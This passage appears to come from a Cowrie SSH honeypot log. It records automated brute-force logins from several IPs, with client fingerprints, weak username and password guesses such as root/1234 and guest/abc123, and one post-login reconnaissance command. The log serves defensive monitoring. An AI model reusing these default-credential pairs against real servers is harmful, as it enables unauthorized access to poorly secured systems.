{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T00:46:15.932987Z","src_ip":"212.227.125.160","session":"2d5e94cb6c23"}
{"eventid":"cowrie.login.failed","username":"guest","password":"abc123","message":"login attempt [guest/abc123] failed","sensor":"my-vps","timestamp":"2025-08-31T00:46:16.156083Z","src_ip":"212.227.125.160","session":"2d5e94cb6c23"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37946,"dst_ip":"1.2.3.4","dst_port":22,"session":"c86187fcd1b7","protocol":"ssh","message":"New connection: 212.227.125.160:37946 (1.2.3.4:22) [session: c86187fcd1b7]","sensor":"my-vps","timestamp":"2025-08-31T00:46:16.437235Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:46:16.962171Z","src_ip":"212.227.125.160","session":"c86187fcd1b7"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T00:46:16.964057Z","src_ip":"212.227.125.160","session":"c86187fcd1b7"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:46:17.310775Z","src_ip":"212.227.125.160","session":"2d5e94cb6c23"}
{"eventid":"cowrie.login.failed","username":"daemon","password":"123456789","message":"login attempt [daemon/123456789] failed","sensor":"my-vps","timestamp":"2025-08-31T00:46:19.970221Z","src_ip":"212.227.125.160","session":"c86187fcd1b7"}
{"eventid":"cowrie.session.closed","duration":"5.2","message":"Connection lost after 5.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:46:21.615916Z","src_ip":"212.227.125.160","session":"c86187fcd1b7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39790,"dst_ip":"1.2.3.4","dst_port":22,"session":"7f72d5b08e73","protocol":"ssh","message":"New connection: 212.227.125.160:39790 (1.2.3.4:22) [session: 7f72d5b08e73]","sensor":"my-vps","timestamp":"2025-08-31T00:46:26.228819Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:46:26.229483Z","src_ip":"212.227.125.160","session":"7f72d5b08e73"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T00:46:26.305026Z","src_ip":"212.227.125.160","session":"7f72d5b08e73"}
{"eventid":"cowrie.login.success","username":"root","password":"1234","message":"login attempt [root/1234] succeeded","sensor":"my-vps","timestamp":"2025-08-31T00:46:26.596163Z","src_ip":"212.227.125.160","session":"7f72d5b08e73"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T00:46:26.875944Z","src_ip":"212.227.125.160","session":"7f72d5b08e73"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T00:46:26.876641Z","src_ip":"212.227.125.160","session":"7f72d5b08e73"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:46:26.955248Z","src_ip":"212.227.125.160","session":"7f72d5b08e73"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:46:27.420218Z","src_ip":"212.227.125.160","session":"7f72d5b08e73"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":473,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:46:33.431172Z","src_ip":"79.124.8.120","session":"7e8d74bc5bd7"}
{"eventid":"cowrie.session.closed","duration":180.06735491752625,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:46:33.434489Z","src_ip":"79.124.8.120","session":"7e8d74bc5bd7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36782,"dst_ip":"1.2.3.4","dst_port":22,"session":"6e0e177f317f","protocol":"ssh","message":"New connection: 212.227.125.160:36782 (1.2.3.4:22) [session: 6e0e177f317f]","sensor":"my-vps","timestamp":"2025-08-31T00:46:36.712773Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:46:36.713622Z","src_ip":"212.227.125.160","session":"6e0e177f317f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T00:46:36.787543Z","src_ip":"212.227.125.160","session":"6e0e177f317f"}
{"eventid":"cowrie.login.failed","username":"sonar","password":"123456","message":"login attempt [sonar/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T00:46:37.067817Z","src_ip":"212.227.125.160","session":"6e0e177f317f"}
{"eventid":"cowrie.session.connect","src_ip":"124.220.134.58","src_port":50006,"dst_ip":"1.2.3.4","dst_port":22,"session":"d664712a5e9e","protocol":"ssh","message":"New connection: 124.220.134.58:50006 (1.2.3.4:22) [session: d664712a5e9e]","sensor":"my-vps","timestamp":"2025-08-31T00:46:37.575825Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:46:37.576701Z","src_ip":"124.220.134.58","session":"d664712a5e9e"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-31T00:46:37.755800Z","src_ip":"124.220.134.58","session":"d664712a5e9e"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.15","src_port":61770,"dst_ip":"1.2.3.4","dst_port":22,"session":"32154aadf0da","protocol":"ssh","message":"New connection: 80.94.95.15:61770 (1.2.3.4:22) [session: 32154aadf0da]","sensor":"my-vps","timestamp":"2025-08-31T00:46:38.085993Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-31T00:46:38.086911Z","src_ip":"80.94.95.15","session":"32154aadf0da"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-31T00:46:38.138346Z","src_ip":"80.94.95.15","session":"32154aadf0da"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:46:38.216959Z","src_ip":"212.227.125.160","session":"6e0e177f317f"}
{"eventid":"cowrie.login.failed","username":"","password":"","message":"login attempt [/] failed","sensor":"my-vps","timestamp":"2025-08-31T00:46:38.451250Z","src_ip":"80.94.95.15","session":"32154aadf0da"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:46:39.504891Z","src_ip":"80.94.95.15","session":"32154aadf0da"}
{"eventid":"cowrie.session.closed","duration":"8.4","message":"Connection lost after 8.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:46:46.022716Z","src_ip":"124.220.134.58","session":"d664712a5e9e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58786,"dst_ip":"1.2.3.4","dst_port":22,"session":"1cafa9c47515","protocol":"ssh","message":"New connection: 212.227.125.160:58786 (1.2.3.4:22) [session: 1cafa9c47515]","sensor":"my-vps","timestamp":"2025-08-31T00:46:47.179220Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:46:47.179924Z","src_ip":"212.227.125.160","session":"1cafa9c47515"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T00:46:47.253920Z","src_ip":"212.227.125.160","session":"1cafa9c47515"}
{"eventid":"cowrie.login.failed","username":"jumpserver","password":"jumpserver","message":"login attempt [jumpserver/jumpserver] failed","sensor":"my-vps","timestamp":"2025-08-31T00:46:47.482504Z","src_ip":"212.227.125.160","session":"1cafa9c47515"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:46:48.583736Z","src_ip":"212.227.125.160","session":"1cafa9c47515"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53894,"dst_ip":"1.2.3.4","dst_port":22,"session":"e9999f92ae2f","protocol":"ssh","message":"New connection: 212.227.235.229:53894 (1.2.3.4:22) [session: e9999f92ae2f]","sensor":"my-vps","timestamp":"2025-08-31T00:46:57.603192Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T00:46:57.604235Z","src_ip":"212.227.235.229","session":"e9999f92ae2f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60630,"dst_ip":"1.2.3.4","dst_port":22,"session":"c6db8f33cf04","protocol":"ssh","message":"New connection: 212.227.125.160:60630 (1.2.3.4:22) [session: c6db8f33cf04]","sensor":"my-vps","timestamp":"2025-08-31T00:46:57.652769Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:46:57.653481Z","src_ip":"212.227.125.160","session":"c6db8f33cf04"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T00:46:57.672475Z","src_ip":"212.227.235.229","session":"e9999f92ae2f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T00:46:57.727015Z","src_ip":"212.227.125.160","session":"c6db8f33cf04"}
{"eventid":"cowrie.login.failed","username":"1p","password":"18atcskd2w","message":"login attempt [1p/18atcskd2w] failed","sensor":"my-vps","timestamp":"2025-08-31T00:46:57.987108Z","src_ip":"212.227.235.229","session":"e9999f92ae2f"}
{"eventid":"cowrie.login.failed","username":"tom","password":"tom123","message":"login attempt [tom/tom123] failed","sensor":"my-vps","timestamp":"2025-08-31T00:46:57.995710Z","src_ip":"212.227.125.160","session":"c6db8f33cf04"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59344,"dst_ip":"1.2.3.4","dst_port":22,"session":"71e991a0dc53","protocol":"ssh","message":"New connection: 212.227.235.229:59344 (1.2.3.4:22) [session: 71e991a0dc53]","sensor":"my-vps","timestamp":"2025-08-31T00:46:58.562593Z"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:46:59.056360Z","src_ip":"212.227.235.229","session":"e9999f92ae2f"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:46:59.131757Z","src_ip":"212.227.125.160","session":"c6db8f33cf04"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:47:00.181507Z","src_ip":"212.227.235.229","session":"71e991a0dc53"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ec